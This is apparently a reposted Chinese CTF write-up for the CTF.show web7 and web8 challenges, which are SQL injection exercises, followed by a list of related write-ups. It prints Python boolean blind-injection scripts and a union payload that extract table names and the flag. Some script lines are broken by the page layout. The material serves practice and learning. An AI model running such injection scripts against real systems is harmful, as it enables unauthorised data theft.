2. 程式人生 > 其它 >CTF.show:web7-web8

CTF.show:web7-web8

阿新 發佈:2021-01-23

技術標籤:CTF.showCTF_Web_Writeup

web7

這題是一題盲注題,對url進行盲注測試
從網上找到的師傅的爆表名指令碼

import  requests
url = "http://1060cceb-f9ef-4fb3-b273-034c74a0bd38.chall.ctf.show/index.php?id=-1'/**/"


def db(url):  # 爆庫名
    for i in range(1, 5):
        for j in range(32, 128):
            u = "or/**/ascii(substr(database()/**/from/**/"
 
 + str(i) + "/**/for/**/1))=" + str(j) + "#"
            s = url + u
            print(s)
            r = requests.get(s)
            if 'By Rudyard Kipling' in r.text:
                print(chr(j))


def table(url):  # 爆表名
    for i in range(4):
        table_name = ''
        for j in range
 
(1, 6):
            for k in range(48, 128):
                u = id = "||/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/" + str(
                    i) + ")/**/from/**/" + str(j) + "/**/for/**/1))=" + str(k)
 
 + "#"
                s = url + u
                print(s)
                r = requests.get(s)
                if 'By Rudyard Kipling' in r.text:
                    table_name += chr(k)
            print(table_name)


db(url);
table(url);

在這裡插入圖片描述在這裡插入圖片描述在這裡插入圖片描述
一共有三個表,嘗試猜測為flag下的flag欄位

/index.php?id=-1/**/union/**/select/**/1,flag,3/**/from/**/flag#

得到flag
在這裡插入圖片描述

web8

這個看起來和web7很像,但是經過測試,對union進行過濾
找了別的師傅的payload
通過布林盲注,測試存在的表名和欄位名,讀取flag

import requests
s=requests.session()
url='http://ab7573d3-1de2-42bd-bc68-26aaca8af4dc.chall.ctf.show/index.php'
table=""

for i in range(1,45):
    print(i)
    for j in range(31,128):
        #爆表名  flag
        #payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #爆欄位名 flag
        #payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #讀取flag
        payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))

        ra = s.get(url=url + '?id=0/**/or/**/' + payload).text

        if 'I asked nothing' in ra:
            table += chr(j)
            print(table)
            break

相關推薦

CTF.showweb7-web8

技術標籤CTF.showCTF_Web_Writeup web7 這題是一題盲注題,對url進行盲注測試 從網上找到的師傅的爆表名指令碼

CTF.showweb11

技術標籤CTF_Web_WriteupCTF.show 程式碼審計 <?php function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\\s|union|,)/i";

CTF.showweb14

技術標籤CTF.showCTF_Web_Writeup 開啟來後執行語句得到提示 ?c=3 當c為3時,不會退出迴圈,進而執行下一個case語句得到url here_1s_your_f1ag.php 進入之後發現是一道注入題目 檢視原始碼發現存在提示

CTF.show萌新web11

技術標籤CTF.showCTF_Web_Writeup <?php # flag in config.php include("config.php"); if(isset($_GET[\'c\'])){

CTF.show萌新web10

技術標籤CTF.showCTF_Web_Writeup <?php # flag in config.php include("config.php"); if(isset($_GET[\'c\'])){

CTF.show萌新web9

技術標籤CTF_Web_WriteupCTF.show <?php # flag in config.php include("config.php"); if(isset($_GET[\'c\'])){

CTF SHOW WEB_AK賽

CTF SHOW平臺的WEB AK賽 簽到_觀己 <?php ​ if(isset($_GET[\'file\'])){ $file = $_GET[\'file\'];

CTF-WEB檔案上傳

目錄檔案上傳一句話木馬上傳過濾webshell例題求 getshell例題upload1 檔案上傳

CTF基本SQL注入之get引數注入(附靶機下載連結永久有效)

靶機地址 連結https://pan.baidu.com/s/1MhYXwhaJ8u08-b-6fg4lXg 提取碼8520 準備環境

ctf.show web板塊

web簽到題 右擊檢視原始碼--> ZmxhZ3szYTIzYzU5OC0zOTIzLTQzMjQtYjlhMi1hZGYzNmM5MGEyZWR9   base64解密即可

ctf show--web 入門 命令執行篇部分題解

技術標籤ctf 最近和朋友一起入了ctf show的坑,在這裡記錄一下刷題過程以及從大佬那裡學到的姿勢。

CTF-WEB攻防世界 ics-05(preg_replace() 函式 /e 漏洞)

目錄檔案包含響應頭偽造preg_replace() 函式獲取 flag 檔案包含 根據題目描述“其他破壞者會利用工控雲管理系統裝置維護中心的後門入侵系統”,開啟裝置維護中心後檢視 F12。

ctf-webPHP變數

特殊變數 可變變數 一個可變變數 “$$” 獲取了一個普通變數的值後,用這個值作為這個可變變數的變數名。一個美元符號表示提取變數中的值,而 2 個連續的美元符號表示用某個變數的內容作為變數名,再來訪問該變數。

ctf.show-misc31

(感謝阿姨)這個misc還是屬於比較陰間的,並且學到了一個新的編碼形式,直接開搞

CTF-WebSqlServer SQL 注入

目錄相關的函式和表常用的函式內建系統表Sysdatabases 表Sysobjects 表Syscolumns 表SqlServer 注入樣例任務目標查詢注入點判斷注入型別判斷列數獲取資料庫資訊獲取敏感資訊SqlServer 盲注樣例任務目標判斷注入型別

CTF-Miscbinwalk與010Editor的使用

題目來源https://ctf.bugku.com/challenges/detail/id/6.html 題目 有趣的表情包 flag隱藏在圖片中

v-if 和 v-show兩種 Vue 條件渲染比較分析來自杏鑫登陸

在Vue中,有兩種方法可以有條件地渲染部分應用程式v-if和v-show。 你可能會問,“為什麼我們需要兩種方法?”

“百度杯”CTF比賽 九月場 型別Web 題目名稱SQLi ---不需要逗號的注入技巧

今天在i春秋做題的時候遇到了一道非常好的題目,於是在參考了wp的基礎上自己復現了一遍,算作一種技巧的學習與收藏吧。

CTF web題 wp

1.簽到題 火狐F12檢視原始碼,發現註釋一次base64解碼出flag 2.Encode 在這裡插入圖片描述

CTFlottery(程式碼審計|==比較繞過)

進入頁面,發現按鈕點了沒有反應,切換頁面都提示要先註冊 發現註冊不了,這時候查找了robots.txt檔案,發現了.git資料夾